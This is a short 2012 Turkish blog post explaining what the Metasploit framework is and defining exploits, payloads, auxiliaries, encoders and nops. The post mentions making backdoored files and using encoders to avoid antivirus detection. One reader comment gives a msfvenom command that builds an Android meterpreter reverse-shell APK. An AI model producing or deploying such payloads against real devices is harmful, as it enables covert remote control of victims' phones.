6/13/2012

Metasploit Nedir?

Metasploit, çeşitli pentestler gerçekleştirmek için içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu framework altyapısıdır.
Metasploit; Linux, Windows Mac-OS ortamlarında çalışabilmektedir.

Metasploit ile sadece direkt saldırı yapılmaz. çeşitli backdoorlu dosyalar yapıp bunlar ile de hedef sisteme saldırı gerçekleştirebilirsiniz. Bunun için işletim sisteminize iis yada apache gibi servisler kurmanız gerekebilir.

Hedef sistemde otomatik olarak açık taramak için localhostunuzda database yönetmeye ihtiyacınız olacak bu yüzden mysql gibi servislerden de yararlanmanız gerekebilir.

Burada adı geçen bazı kavramların tanımlamasını yapacak olursak:

Exploit: Hedef sistemde çalışan servis yada uygulamaların zayıflıklarını kullanarak amaçlara ulaşmak için kullanılan güvenlik açıklarıdır.

Payload: Exploit sonrasında hedef sisteme sızmayı sağlayan ve istenilen işlemleri gerçekleştirmek için kullanılan bileşenlerdir. Örnek ile açıklayacak olursak bir servisin açığını kullanmak exploitin, o açıktan faydalanarak sistemde kullanıcı oluşturmak ise payload'un görevidir.
Sıklıkla kullanılan önemli payloadlar; Meterpreter, dll injection, passivex ...

Auxiliary: Exploit öncesi hedef sistemde bilgi toplama amaçlı kullanılabilecek bileşenlerdir.

Encoders: Exploit içinde kullanılan kodların (ki o kodlara shellcode denilir) çalışmasını bozmadan antivirüsler, firewaller, IPS, IDS tarafından tanınmamasını sağlamak için kullanılan bileşenlerdir.

Nop: Çeşitli sistemlerde hafızadaki veri ve dönüşü hakkında bilgi edinmek için kullanılabilir. İleri seviye işlemlerde kullanılmaktadırlar.

Metasploit download adresi: http://www.metasploit.com/download/

Metasploit hakkında biraz daha bilgi edinmek isteyenler için kaynak: http://www.bga.com.tr/calismalar/MetasploitElKitabi.pdf

Metasploit kullanımı hakkında bilgi edinmenizi sağlamak adına video hazırladım. Faydalı olması dileği ile iyi seyirler..



7 Yorum:

  1. eline koluna sağlık hocam
    eskiden pentest ile ilgili konu ararken google'ye şunu yazardım
    metasploit nedir
    şimdi ise şöyle yazıyorum
    metasploit nedir dataman

    =))

    YanıtlaSil
  2. oluyor kod ise :

    msfvenom -p android/meterpreter/reverse_tcp LHOST=(dış ip) LPORT=actigin port -o (dosya adi.apk

    YanıtlaSil
  3. LHOST yerel iğ dir RHOST ise dış ip dir

    YanıtlaSil

© 2012- Hackings.org Bu Sitenin hakları Aziz Türk milletine Aittir.
"Benim hayatta yegâne fahrim, servetim Türklükten başka bir şey değildir." K.ATATÜRK